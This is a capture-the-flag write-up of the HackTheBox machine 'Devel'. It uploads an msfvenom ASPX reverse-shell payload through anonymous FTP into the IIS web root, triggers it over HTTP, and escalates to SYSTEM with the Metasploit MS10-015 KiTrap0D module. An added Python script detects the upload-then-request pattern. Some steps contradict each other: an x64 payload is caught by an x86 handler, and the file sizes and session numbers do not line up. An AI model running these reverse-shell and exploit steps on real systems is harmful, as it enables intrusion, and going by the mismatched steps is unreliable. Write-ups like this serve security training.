HackTheBox - Devel

Updated 29-03-2026

A classic retired Windows machine that chains anonymous FTP write access with an unpatched kernel vulnerability to achieve full system compromise.

Recon

Nmap

$ sudo nmap -sC -sV -Pn 10.129.15.142
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-03 20:06 -0500
Nmap scan report for 10.129.15.142
Host is up (1.1s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17 01:06AM <DIR> aspnet_client
| 03-17-17 04:37PM 689 iisstart.htm
|_03-17-17 04:37PM 184946 welcome.png
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
| http-methods:
|_ Potentially risky methods: TRACE
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 141.13 seconds

Two ports are open:

  • 21/tcp — Microsoft FTP with anonymous login allowed; the directory listing already shows IIS web root files (iisstart.htm, welcome.png)
  • 80/tcp — Microsoft IIS 7.5 serving a default IIS page

The fact that the FTP listing mirrors the IIS web root is the key finding — if anonymous FTP has write access, we can upload a payload and trigger it over HTTP.


Foothold

Hosts File

$ echo '10.129.15.142 devel.htb' | sudo tee -a /etc/hosts

FTP Enumeration

The website serves only the default IIS page with nothing useful. Connecting to FTP anonymously confirms the directory is the IIS web root:

$ ftp devel.htb    
Connected to devel.htb.
220 Microsoft FTP Service
Name (devel.htb:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||49176|)
125 Data connection already open; Transfer starting.
03-18-17 01:06AM <DIR> aspnet_client
03-17-17 04:37PM 689 iisstart.htm
03-17-17 04:37PM 184946 welcome.png
226 Transfer complete.
ftp>

Testing write access confirms anonymous users can create and delete directories:

ftp> mkdir test
257 "test" directory created.
ftp> rmdir test
250 RMD command successful.

Uploading a Reverse Shell

The server runs IIS, and the aspnet_client folder in the web root indicates that ASP.NET is enabled, so an uploaded .aspx page will be executed server-side rather than served as static content. We generate an ASPX reverse shell payload with msfvenom:

$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.4 LPORT=4444 -f aspx -o shell.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of aspx file: 3696 bytes
Saved as: shell.aspx

Upload the payload via FTP:

ftp> put shell.aspx
local: shell.aspx remote: shell.aspx
229 Entering Extended Passive Mode (|||49178|)
125 Data connection already open; Transfer starting.
100% |*********************************************************************| 15969 80.57 MiB/s --:-- ETA
226 Transfer complete.
15969 bytes sent in 00:00 (36.37 KiB/s)

Start a Metasploit listener before triggering the payload:

$ msfconsole
msf > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST 10.10.16.4
LHOST => 10.10.16.4
msf exploit(multi/handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(multi/handler) > exploit -j
[*] Exploit running as background job 12.
[*] Exploit completed, but no session was created.
msf exploit(multi/handler) >
[*] Started reverse TCP handler on 10.10.16.4:4444

Trigger the payload by requesting the uploaded file over HTTP:

$ curl http://devel.htb/shell.aspx

A Meterpreter session opens:

[*] Sending stage (190534 bytes) to 10.129.15.142
meterpreter > [*] Meterpreter session 10 opened (10.10.16.4:4444 -> 10.129.15.142:49202) at 2026-03-03

msf exploit(multi/handler) > sessions 10
[*] Starting interaction with 10...

meterpreter >
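From the defender's side, this foothold leaves a distinctive pair of records: an anonymous STOR of a server-side script in the Microsoft FTP Service log, followed shortly by an HTTP request for the same path in the IIS log. The following is an added example (not part of the original writeup) that correlates the two; the log lines are constructed samples in W3C extended format, and the field names are taken from each file's #Fields: header, which is an assumption about how logging is configured.

```python
"""Correlate anonymous FTP uploads of server-side scripts with later HTTP
requests for the same path (the FTP-to-IIS chain used against Devel)."""
from datetime import datetime, timedelta
# Constructed sample records in W3C extended format (not real Devel logs);
# field names are read from the #Fields: header rather than hard-coded.
FTP_LOG = """#Fields: date time c-ip cs-username cs-method cs-uri-stem sc-status
2026-03-03 20:41:02 10.10.16.4 anonymous USER anonymous 331
2026-03-03 20:41:20 10.10.16.4 anonymous MKD /test 257
2026-03-03 20:41:25 10.10.16.4 anonymous RMD /test 250
2026-03-03 20:45:10 10.10.16.4 anonymous STOR /shell.aspx 226
2026-03-03 20:45:30 10.10.16.4 anonymous STOR /welcome2.png 226
"""
HTTP_LOG = """#Fields: date time c-ip cs-method cs-uri-stem sc-status
2026-03-03 20:46:01 10.10.16.4 GET /shell.aspx 200
2026-03-03 20:47:12 10.10.14.9 GET /iisstart.htm 200
"""
SCRIPT_EXTS = (".aspx", ".asp", ".ashx", ".asmx")  # IIS script handlers (assumed list)

def parse_w3c(text):
    """Yield one dict per record, keyed by the names in the #Fields: header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split()))

def ts(rec):
    return datetime.strptime(rec["date"] + " " + rec["time"], "%Y-%m-%d %H:%M:%S")

def find_upload_then_execute(ftp_text, http_text, window=timedelta(hours=1)):
    """Return (ftp_client, path, http_client) for every script file STORed by
    the 'anonymous' FTP user that an HTTP client then requested within window."""
    uploads = [r for r in parse_w3c(ftp_text)
               if r["cs-method"] == "STOR" and r["cs-username"] == "anonymous"
               and r["sc-status"].startswith("2")
               and r["cs-uri-stem"].lower().endswith(SCRIPT_EXTS)]
    requests = list(parse_w3c(http_text))
    hits = []
    for up in uploads:
        for req in requests:
            same_path = req["cs-uri-stem"].lower() == up["cs-uri-stem"].lower()
            if same_path and timedelta(0) <= ts(req) - ts(up) <= window:
                hits.append((up["c-ip"], up["cs-uri-stem"], req["c-ip"]))
    return hits

if __name__ == "__main__":
    for ftp_ip, path, http_ip in find_upload_then_execute(FTP_LOG, HTTP_LOG):
        print(f"ALERT: {path} stored via anonymous FTP from {ftp_ip}, then requested over HTTP from {http_ip}")
```

The non-script upload (welcome2.png) and the ordinary request for iisstart.htm produce no alert; only the script stored by the anonymous user and then fetched over HTTP does.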

Privilege Escalation

MS10-015 — KiTrap0D

Background the session and run local_exploit_suggester to identify applicable local privilege escalation exploits for this host:

meterpreter > background
[*] Backgrounding session 10...
msf exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf post(multi/recon/local_exploit_suggester) > set SESSION 10
SESSION => 10
msf post(multi/recon/local_exploit_suggester) > run
[*] 10.129.15.142 - Collecting local exploits for x86/windows...
/usr/share/metasploit-framework/lib/rex/proto/ldap.rb:13: warning: already initialized constant Net::LDAP::WhoamiOid
/usr/share/metasploit-framework/vendor/bundle/ruby/3.3.0/gems/net-ldap-0.20.0/lib/net/ldap.rb:344: warning: previous definition of WhoamiOid was here
[*] 10.129.15.142 - 239 exploit checks are being tried...
[+] 10.129.15.142 - exploit/windows/local/bypassuac_comhijack: The target appears to be vulnerable.
[+] 10.129.15.142 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.129.15.142 - exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move: The service is running, but could not be validated. Vulnerable Windows 7/Windows Server 2008 R2 build detected!
[+] 10.129.15.142 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.

<-SNIP->

Working through the suggestions, exploit/windows/local/ms10_015_kitrap0d succeeds. MS10-015 (KiTrap0D) is a kernel vulnerability in the Windows #GP trap handler that lets a local user gain SYSTEM privileges by exploiting improper handling of certain processor exceptions. Note that the suggester identified the session as x86/windows, which matters here: the Metasploit module relies on a 32-bit DLL and is not supported on x64 editions of Windows:

msf exploit(exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move) > use windows/local/ms10_015_kitrap0d
[*] Using configured payload windows/meterpreter/reverse_tcp
msf exploit(windows/local/ms10_015_kitrap0d) > set LHOST 10.10.16.4
LHOST => 10.10.16.4
msf exploit(windows/local/ms10_015_kitrap0d) > set LPORT 1234
LPORT => 1234
msf exploit(windows/local/ms10_015_kitrap0d) > run
[*] Started reverse TCP handler on 10.10.16.4:1234
[*] Reflectively injecting payload and triggering the bug...
[*] Launching msiexec to host the DLL...
[+] Process 4076 launched.
[*] Reflectively injecting the DLL into 4076...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (190534 bytes) to 10.129.15.142
[*] Meterpreter session 4 opened (10.10.16.4:1234 -> 10.129.15.142:49162) at 2026-03-03 21:43:07 -0500

meterpreter >

A new Meterpreter session opens with NT AUTHORITY\SYSTEM privileges. Both the user and root flags can now be retrieved.